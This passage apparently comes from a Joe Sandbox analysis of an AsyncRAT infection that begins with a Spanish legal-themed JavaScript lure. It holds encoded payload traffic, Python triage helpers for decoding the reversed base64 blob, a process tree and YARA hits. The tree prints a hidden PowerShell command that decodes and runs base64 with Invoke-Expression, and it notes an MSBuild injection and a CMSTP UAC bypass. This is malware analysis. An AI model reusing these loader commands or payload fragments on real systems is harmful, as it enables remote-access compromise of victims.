Data Ascii: AAgAA0AAAAAAAAAAAAUGAtBQYA4EA0BwYAUHAkBwbAIHAQBQAAEAAiAAAAAAAlBAeAUGAuAgYAUHA0BwUAAAAlBQbAEGAuBQZAwGApBgRAwGAhBgbAkGAnBQaAIHAPBQAAkAA6AAAAAAAAAAAAMHArBgcAEGAtBQZAQGAhBgcAQFAsBQYAcGAlBATAEAABAgKAAAAAAAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAAEAAmAAAAAAAlB
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 43 41 6c 38 50 41 41 41 41 41 41 77 47 62 6b 35 53 5a 6c 4a 33 62 6a 4e 58 62 41 34 57 61 68 31 55 5a 34 56 6b 63 76 4e 30 58 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 67 44 67 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 51 41 4f 34 4b 41 41 41 41 41 41 41 41 41 41 41 51 41 4f 77 49 41 41 41 51 42 64 6b 71 67 53 55 51 48 35 45 6f 45 45 63 41 44 74 4b 59 45 78 4a 52 41 43 41 43 43 46 30 52 42 64 6b 71 67 53 67 51
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCAl8PAAAAAAwGbk5SZlJ3bjNXbA4Wah1UZ4VkcvN0XAAAAAAAAAAAAAAAAAAAAAAAAAEgDgCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAQAO4KAAAAAAAAAAAQAOwIAAAQBdkqgSUQH5EoEEcADtKYExJRACACCF0RBdkqgSgQ
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 34 51 56 42 4b 68 41 67 63 51 42 64 49 67 44 56 46 6f 45 42 41 69 42 46 30 52 56 42 4b 68 41 48 63 51 38 42 47 42 48 4f 45 77 41 67 67 67 41 56 46 6f 45 43 63 67 42 70 48 6f 45 42 45 41 41 47 49 41 45 4f 49 51 41 44 41 79 42 4f 6b 69 45 43 63 51 42 68 48 59 45 68 48 59 45 43 49 41 41 4a 45 65 67 52 41 41 49 46 6b 6a 45 64 41 41 41 46 6b 6a 45 49 6b 6a 45 64 4d 77 42 49 34 51 48 4f 34 67 41 41 59 41 41 54 30 42 41 67 55 41 41 54 45 51 41 67 55 67 44 42 45 6c 45 56 55 67 44 64 47 6f 45 5a 47 6f 45 4f 45 51 55 53 55 52 6b 42 4b 52 42 48 45 52 33 42 47 68 41 42 41 69 42 56 48 6f 45 42 45 41 49 47 55 64 67 53 41 41 41 46 30 51 44 42 41 41 42 4f 67 41 43 49 67 51 42 48 63 51 4e 52 55 54 45 42 41 69 42 4e 55 54 45 42 41 51 42 77 45 52 41 4b 51 41 41 65 67 51 41
Data Ascii: 4QVBKhAgcQBdIgDVFoEBAiBF0RVBKhAHcQ8BGBHOEwAgggAVFoECcgBpHoEBEAAGIAEOIQADAyBOkiECcQBhHYEhHYECIAAJEegRAAIFkjEdAAAFkjEIkjEdMwBI4QHO4gAAYAAT0BAgUAATEQAgUgDBElEVUgDdGoEZGoEOEQUSURkBKRBHER3BGhABAiBVHoEBEAIGUdgSAAAF0QDBAABOgACIgQBHcQNRUTEBAiBNUTEBAQBwERAKQAAegQA
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 41 41 46 45 6e 45 46 34 67 41 41 59 51 63 53 34 51 41 41 55 41 43 78 4a 68 44 43 41 67 42 41 41 41 41 4c 51 41 41 41 41 67 43 45 41 41 41 41 6b 41 42 41 41 41 41 49 51 41 41 41 41 77 42 45 41 41 41 41 59 41 42 41 41 41 41 46 51 41 41 41 41 41 42 45 41 41 41 41 4d 41 42 41 41 41 41 41 51 41 65 52 41 41 4b 45 41 6e 45 41 67 43 42 4e 41 41 4b 44 6f 41 41 6f 4d 67 44 41 67 79 41 70 4a 42 41 67 51 41 65 52 41 41 49 45 41 6e 45 41 41 43 42 4e 45 51 41 67 51 41 44 42 45 41 49 45 49 51 41 42 41 43 42 4f 41 41 49 44 34 67 41 42 41 43 42 49 34 51 41 43 41 53 42 4f 34 51 41 43 41 53 42 46 30 42 41 67 51 51 42 64 45 51 41 67 55 51 44 41 41 79 41 4b 41 41 49 44 73 41 41 67 4d 77 43 42 45 41 49 45 6f 51 41 42 41 43 42 78 4a 52 41 42 41 53 42 4f 67 51 41 67 51 41 63 53
Data Ascii: AAFEnEF4gAAYQcS4QAAUACxJhDCAgBAAAALQAAAAgCEAAAAkABAAAAIQAAAAwBEAAAAYABAAAAFQAAAAABEAAAAMABAAAAAQAeRAAKEAnEAgCBNAAKDoAAoMgDAgyApJBAgQAeRAAIEAnEAACBNEQAgQADBEAIEIQABACBOAAID4gABACBI4QACASBO4QACASBF0BAgQQBdEQAgUQDAAyAKAAIDsAAgMwCBEAIEoQABACBxJRABASBOgQAgQAcS
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 41 79 41 41 57 41 6f 44 41 77 41 77 65 50 41 41 41 67 41 51 66 41 4d 44 41 45 42 67 4f 41 41 44 41 37 39 41 41 41 49 44 41 59 56 41 41 41 34 43 41 70 41 77 51 41 45 45 41 4e 42 41 4b 41 41 43 41 6c 42 41 5a 41 38 47 41 6a 42 41 49 41 34 47 41 76 42 51 61 41 51 48 41 68 42 77 59 41 6b 47 41 30 42 67 62 41 55 47 41 6f 42 41 64 41 55 48 41 68 42 41 49 41 55 47 41 6e 42 51 59 41 4d 48 41 7a 42 51 5a 41 30 47 41 67 41 41 5a 41 6b 47 41 73 42 51 59 41 59 48 41 75 42 51 53 56 42 41 41 75 41 41 62 41 77 47 41 31 42 67 62 41 41 43 41 6c 42 67 59 41 41 43 41 30 42 77 62 41 34 47 41 67 41 67 62 41 45 47 41 6a 42 41 49 41 51 48 41 31 42 41 63 41 34 47 41 70 31 43 41 41 34 43 41 35 42 41 64 41 41 48 41 74 42 51 5a 41 41 43 41 79 42 77 62 41 41 43 41 73 42 41 62 41 55
Data Ascii: AyAAWAoDAwAwePAAAgAQfAMDAEBgOAADA79AAAIDAYVAAA4CApAwQAEEANBAKAACAlBAZA8GAjBAIA4GAvBQaAQHAhBwYAkGA0BgbAUGAoBAdAUHAhBAIAUGAnBQYAMHAzBQZA0GAgAAZAkGAsBQYAYHAuBQSVBAAuAAbAwGA1BgbAACAlBgYAACA0BwbA4GAgAgbAEGAjBAIAQHA1BAcA4GAp1CAA4CA5BAdAAHAtBQZAACAyBwbAACAsBAbAU
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 69 4e 42 41 41 6b 48 41 34 42 77 62 41 49 48 41 51 42 41 62 41 77 47 41 70 42 77 53 54 41 41 41 6c 42 41 62 41 45 47 41 6a 42 77 55 41 51 48 41 6c 42 77 63 41 55 47 41 53 56 42 41 41 4d 48 41 77 42 41 62 41 77 47 41 70 42 77 61 4e 41 41 41 73 42 67 63 41 55 48 41 69 42 51 5a 41 63 58 44 41 41 41 64 41 4d 48 41 68 42 67 64 41 45 30 43 41 41 41 64 41 55 47 41 6e 42 41 62 41 73 32 43 41 41 51 4e 41 4d 44 41 30 42 51 5a 41 34 30 43 41 41 67 62 41 38 47 41 70 42 77 63 41 55 48 41 73 42 77 59 41 67 48 41 46 42 41 52 41 63 31 46 41 41 67 62 41 55 47 41 6c 42 67 63 41 4d 47 41 7a 42 41 64 41 55 47 41 6e 4e 42 41 41 73 47 41 7a 42 51 5a 41 51 47 41 35 42 67 62 41 45 32 44 41 41 77 63 41 4d 48 41 68 42 41 55 41 49 48 41 6c 42 77 63 41 63 48 41 76 42 67 63 41 49 45
Data Ascii: iNBAAkHA4BwbAIHAQBAbAwGApBwSTAAAlBAbAEGAjBwUAQHAlBwcAUGASVBAAMHAwBAbAwGApBwaNAAAsBgcAUHAiBQZAcXDAAAdAMHAhBgdAE0CAAAdAUGAnBAbAs2CAAQNAMDA0BQZA40CAAgbA8GApBwcAUHAsBwYAgHAFBARAc1FAAgbAUGAlBgcAMGAzBAdAUGAnNBAAsGAzBQZAQGA5BgbAE2DAAwcAMHAhBAUAIHAlBwcAcHAvBgcAIE
2025-04-26 00:53:50 UTC | 1369 | IN | Data Raw: 42 51 4c 52 41 41 41 7a 42 51 5a 41 77 47 41 70 42 67 5a 41 38 47 41 79 42 41 55 41 77 46 41 34 42 77 62 41 59 47 41 6c 42 67 63 41 6b 47 41 47 42 41 58 41 45 47 41 73 42 41 62 41 6b 47 41 36 42 77 62 41 30 45 41 63 4e 44 41 41 4d 48 41 30 42 51 5a 41 77 47 41 73 42 51 59 41 63 46 41 73 42 77 62 41 38 47 41 43 64 42 41 41 41 48 41 31 42 77 62 41 49 48 41 48 74 41 41 41 63 47 41 75 42 77 62 41 41 56 43 41 41 51 5a 41 49 48 41 76 42 77 51 41 41 43 41 75 42 51 61 41 38 47 41 6a 42 41 64 41 6b 47 41 43 6c 42 41 41 55 47 41 79 42 77 62 41 4d 45 41 66 42 67 62 41 6b 47 41 76 42 77 59 41 51 48 41 70 42 67 51 5a 41 41 41 75 42 51 61 41 38 47 41 6a 42 41 64 41 6b 47 41 43 42 41 58 52 41 41 41 6c 42 77 59 41 34 47 41 68 42 67 62 41 6b 47 41 43 39 41 41 41 55 47 41
Data Ascii: BQLRAAAzBQZAwGApBgZA8GAyBAUAwFA4BwbAYGAlBgcAkGAGBAXAEGAsBAbAkGA6BwbA0EAcNDAAMHA0BQZAwGAsBQYAcFAsBwbA8GACdBAAAHA1BwbAIHAHtAAAcGAuBwbAAVCAAQZAIHAvBwQAACAuBQaA8GAjBAdAkGAClBAAUGAyBwbAMEAfBgbAkGAvBwYAQHApBgQZAAAuBQaA8GAjBAdAkGACBAXRAAAlBwYA4GAhBgbAkGAC9AAAUGA
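Added triage example, not part of the Joe Sandbox report or of the sample: Python helpers for the two artifacts PowerShell (PID 7776) pulled in the sessions above. `jpeg_sof_info` walks the JPEG marker segments of the captured head of new_image.jpg (session 1) and reads the frame header, so an analyst can tell whether the 3,172,652-byte "image" is at least a well-formed JPEG before looking for anything hidden in it. `gcs_md5_hex` turns the Cloud Storage `x-goog-hash: md5=` value from the Discord response (session 2) into hex so it can be compared with the ETag and kept as the hash of ConvertedFile.txt as served. `strings_in_reversed_window` applies what the captured windows of ConvertedFile.txt show when read back to front: reversing the 00:53:50 window that starts `AAgAA0AAAA` and base64-decoding it yields UTF-16LE VERSIONINFO strings (OriginalFilename, Stub.exe, LegalTrademarks), and the preceding window that starts `GbwBXY6Mjd` yields an application manifest (`<supportedOS Id=...>`), so the text body is a base64 string stored reversed; because a captured window has no known base64 group boundary, all four alignments are tried. `classify_text_payload` is the check to run on the complete file once it is recovered: does the blob decode to an MZ/PE image as stored, or only after the string is reversed? The byte strings marked as quoted are copied from the report; the MZ/PE stub that exercises `classify_text_payload` is constructed for this example and is not the sample.

```python
"""Triage helpers for the two artifacts PowerShell (PID 7776) fetched in this report.
Added example; strings marked 'quoted from the report' are copied from the HTTP sessions above."""
import base64
import binascii
import hashlib
import re

# Quoted from the report (session 1, first chunk of new_image.jpg), up to the end of the SOF0 segment.
# bytes.fromhex ignores the spaces; the two quantisation tables are written out 32 bytes per row.
JPEG_HEAD = bytes.fromhex(
    "ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 "
    "ff db 00 43 00 "
    "08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a "
    "1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 "
    "ff db 00 43 01 "
    "09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 " + "32 " * 48 +
    "ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01"
)
# Quoted from the report (session 2, ConvertedFile.txt): the displayed part of two 1369-byte chunks.
WINDOW_MANIFEST = b"GbwBXY6MjdtNXY8ACIK0gP5RXaslmYpRXYw12bj9CPgAiCN4jbvlGdhNWasBHch9CPgACIgoQD+8iI9FWOhVTMhBTNkZGO00SNhljYtgTZmRTLzImZi1iMxE2NmBTZ4snI9QWSgM1TkVGdy9GcwV3c8ACIgACIgoQD+0SLgATMgM3dvRmbpdFIt0SI8ACIgACIgoQD+8iI9hzNhRGMkZjZwQ2M40iYiVTOtkzMyQTLxUGM40iN3MmN3YjZxsnI9"
WINDOW_VERSIONINFO = b"AAgAA0AAAAAAAAAAAAUGAtBQYA4EA0BwYAUHAkBwbAIHAQBQAAEAAiAAAAAAAlBAeAUGAuAgYAUHA0BwUAAAAlBQbAEGAuBQZAwGApBgRAwGAhBgbAkGAnBQaAIHAPBQAAkAA6AAAAAAAAAAAAMHArBgcAEGAtBQZAQGAhBgcAQFAsBQYAcGAlBATAEAABAgKAAAAAAAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAAEAAmAAAAAAAlB"
# Quoted from the report (session 2 response headers).
X_GOOG_MD5 = "md5=JrJCqoVco5VggSYh5vwuuA=="
ETAG = '"26b242aa855ca39560812621e6fc2eb8"'

B64_ALPHABET = re.compile(rb"[A-Za-z0-9+/=]+")
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def jpeg_sof_info(data: bytes):
    """Walk marker segments to the first SOF0/1/2 and return (width, height, components).
    None: not a JPEG, truncated before the frame header, or scan data reached first."""
    if data[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                                  # fill byte before a marker
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:        # RSTn, SOI, TEM carry no length
            pos += 2
            continue
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if marker in (0xC0, 0xC1, 0xC2):
            seg = data[pos + 4:pos + 2 + length]            # precision, height, width, components
            if len(seg) < 6:
                return None
            return int.from_bytes(seg[3:5], "big"), int.from_bytes(seg[1:3], "big"), seg[5]
        if marker == 0xDA:                                  # SOS: entropy-coded data follows
            return None
        pos += 2 + length
    return None


def is_pe(data: bytes) -> bool:
    """MZ stub and a PE\\0\\0 signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _decode_at_all_alignments(b64: bytes):
    """A captured window of a base64 stream has an unknown group boundary: try all four offsets."""
    body = b"".join(b64.split()).strip(b"=")
    for offset in range(4):
        s = body[offset:]
        s = s[: len(s) - len(s) % 4]                        # drop the partial trailing group
        try:
            yield base64.b64decode(s, validate=True)
        except binascii.Error:
            continue


def strings_in_reversed_window(window: bytes) -> set:
    """Reverse the window (the stored blob is a reversed base64 string), decode, and collect
    printable ASCII and UTF-16LE runs of six or more characters."""
    found = set()
    for blob in _decode_at_all_alignments(window[::-1]):
        found.update(m.decode("ascii") for m in ASCII_RUN.findall(blob))
        found.update(m.decode("utf-16-le") for m in UTF16_RUN.findall(blob))
    return found


def classify_text_payload(text: bytes) -> dict:
    """For the complete file: is it base64, and does it decode to a PE as stored ('direct')
    or only after the whole string is reversed ('reversed')?"""
    body = b"".join(text.split())
    result = {"base64": False, "orientation": None, "decoded_len": 0, "md5": None}
    if not body or not B64_ALPHABET.fullmatch(body):
        return result
    result["base64"] = True
    for orientation, candidate in (("direct", body), ("reversed", body[::-1])):
        s = candidate.strip(b"=")                           # reversal moves '=' to the front
        s += b"=" * (-len(s) % 4)
        try:
            decoded = base64.b64decode(s, validate=True)
        except binascii.Error:
            continue
        if is_pe(decoded):
            result.update(orientation=orientation, decoded_len=len(decoded),
                          md5=hashlib.md5(decoded).hexdigest())
            break
    return result


def gcs_md5_hex(x_goog_hash_md5: str) -> str:
    """x-goog-hash carries md5 as base64; hex compares directly with the ETag and fits an IOC list."""
    return base64.b64decode(x_goog_hash_md5.removeprefix("md5=")).hex()


# Constructed test input (not from the report): a minimal MZ/PE header, base64-encoded, then reversed.
FAKE_PE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 32
FAKE_DIRECT_BLOB = base64.b64encode(FAKE_PE)
FAKE_REVERSED_BLOB = FAKE_DIRECT_BLOB[::-1]

if __name__ == "__main__":
    print("JPEG frame (width, height, components):", jpeg_sof_info(JPEG_HEAD))
    print("x-goog-hash md5 == ETag:", gcs_md5_hex(X_GOOG_MD5) == ETAG.strip('"'))
    print("VERSIONINFO window:", sorted(strings_in_reversed_window(WINDOW_VERSIONINFO)))
    print("manifest window:", sorted(strings_in_reversed_window(WINDOW_MANIFEST)))
    print("constructed blob:", classify_text_payload(FAKE_REVERSED_BLOB))
```

Run as a script it prints the frame header of the captured JPEG (3840 x 2160, three components, i.e. a photograph-sized image rather than a stub), confirms that the Discord response's md5 matches its ETag, and lists the VERSIONINFO and manifest strings recovered from the two windows. Two further points worth recording from the sessions themselves: the archive.org requests carry a bare `User-Agent: Mozilla/5.0`, and the request to cdn.discordapp.com carries no User-Agent at all, both of which separate this client from a browser or from PowerShell's default Invoke-WebRequest agent string.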



Target ID: 0
Start time: 20:53:33
Start date: 25/04/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js"
Imagebase: 0x7ff60aca0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 20:53:42
Start date: 25/04/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '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' -replace '','';$tempiettos = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($embolic));Invoke-Expression $tempiettos;"
Imagebase: 0x7ff7016f0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 20:53:42
Start date: 25/04/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff62fc20000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 20:53:47
Start date: 25/04/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"
Imagebase: 0x7ff72c240000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 20:53:47
Start date: 25/04/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff62fc20000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 20:53:48
Start date: 25/04/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase: 0xbb0000
File size: 262'432 bytes
MD5 hash: 8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: false

                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: aq$ aq$,$xq$#q^$3q^
                                                                                  • API String ID: 0-4185940443
                                                                                  • Opcode ID: 014d3e0369fe55249c55d360ec0117ea2888ad447ccdeefb562997adeb30d543
                                                                                  • Instruction ID: da0c616f0b3cc73d5023ada49dbc45aa263bf20cf3c1c1e5e5bf78f035ea028d
                                                                                  • Opcode Fuzzy Hash: 014d3e0369fe55249c55d360ec0117ea2888ad447ccdeefb562997adeb30d543
                                                                                  • Instruction Fuzzy Hash: 3202B038B002019FDB15EB29D894B6E77E2BF84710F24866DD5119F3A5DFB5AC46CB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (q$Teq
                                                                                  • API String ID: 0-2049869722
                                                                                  • Opcode ID: d3a32df4411e9bfbc9eb3a4c3287d423a9643c1306e85b4f39a66ba214381ab1
                                                                                  • Instruction ID: 97d12623a3bdbb9e09eba98f6c74bf11de9fad1f371cf8e59ee03692e9979b52
                                                                                  • Opcode Fuzzy Hash: d3a32df4411e9bfbc9eb3a4c3287d423a9643c1306e85b4f39a66ba214381ab1
                                                                                  • Instruction Fuzzy Hash: F6518A74B002049FD745DF79D454A5EBBF2BF89B00F2580AEE906EB3A2DA719D01CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hq$dLq
                                                                                  • API String ID: 0-4038822049
                                                                                  • Opcode ID: 10b45ed48160bdabb0975c4e0d82c830cca713b6c789c2eb099a2fe5ae09545f
                                                                                  • Instruction ID: 8bc2c32769c321707dcd174ef162f5f21cf36703db8e4e7f3861461e89ec92c3
                                                                                  • Opcode Fuzzy Hash: 10b45ed48160bdabb0975c4e0d82c830cca713b6c789c2eb099a2fe5ae09545f
                                                                                  • Instruction Fuzzy Hash: 0741C034B042048FDB15DF69D454A9EBBF6BF89214F1845AEE101EB3A2CA759C05CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LRq
                                                                                  • API String ID: 0-3187445251
                                                                                  • Opcode ID: 56b475717cf038d2ac992feb607137caee7a17160ba16ebc479f0d5f45c20b6e
                                                                                  • Instruction ID: 021bad0d014a313cbfd6b2e6754a5f777ac1ff433731ea71a1a31272e12c62e1
                                                                                  • Opcode Fuzzy Hash: 56b475717cf038d2ac992feb607137caee7a17160ba16ebc479f0d5f45c20b6e
                                                                                  • Instruction Fuzzy Hash: AC319A70F002158FCB44AB7D8851A6EBBF2BF89711B24456EE546DB3A5EE34DD028790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dLq
                                                                                  • API String ID: 0-2312315067
                                                                                  • Opcode ID: 80b6fe48482a8ab439f8793befefab9f0311a064cbc423876670ad0ffba93f7e
                                                                                  • Instruction ID: b183f6f77f104ad74525cd3ac82cdd1220477af50d7ac33c896139ee88acb5e0
                                                                                  • Opcode Fuzzy Hash: 80b6fe48482a8ab439f8793befefab9f0311a064cbc423876670ad0ffba93f7e
                                                                                  • Instruction Fuzzy Hash: A4319C39A00208CFDB14DF69C458BAEBBF2BF88310F18856AE501AB361CB749C45CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hq
                                                                                  • API String ID: 0-1594803414
                                                                                  • Opcode ID: 13e1e9bc81df8c8a2c4526c79d37ba4094d8b5439e35bf073085dcfcca452793
                                                                                  • Instruction ID: 39668b70657fd7d3bb508513b7c067af707c25bd12e41ed79a257a8d2d624813
                                                                                  • Opcode Fuzzy Hash: 13e1e9bc81df8c8a2c4526c79d37ba4094d8b5439e35bf073085dcfcca452793
                                                                                  • Instruction Fuzzy Hash: 9801D13070A3800FD34BAB39685059A3FA79FCB22436944EBE145CB3A7DE298C0683D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3c7476512fc1cd06fa604ed77a2a6cc2b2cd167708e7ec1df031ab9bd0681216
                                                                                  • Instruction ID: 05b63f2fa20b13cb24e213c1afdc4b681acd8ed9e39ea2f50150f9121b51862c
                                                                                  • Opcode Fuzzy Hash: 3c7476512fc1cd06fa604ed77a2a6cc2b2cd167708e7ec1df031ab9bd0681216
                                                                                  • Instruction Fuzzy Hash: B051C338A01721CFCF6BEF3AF8889497763BB852157108768D4018B25DEB75AD4ACF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf5dee53103110fefc665e9d4ac36ff30aeb918d08b81118cab01d4e33b35955
                                                                                  • Instruction ID: 8a1366935548c0679b372965abe714eedab4f1f9ab32bafe4ad1bce75b0763db
                                                                                  • Opcode Fuzzy Hash: cf5dee53103110fefc665e9d4ac36ff30aeb918d08b81118cab01d4e33b35955
                                                                                  • Instruction Fuzzy Hash: 87411D75F102389BEF189BA9DC54BDE77BBBB8C710F144119E805B3784CA756D028BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2431835837.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_14c0000_MSBuild.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1d3820f6fa9f59ede7185d590635a414a0602c0d49e0a648dae303f4bb5875
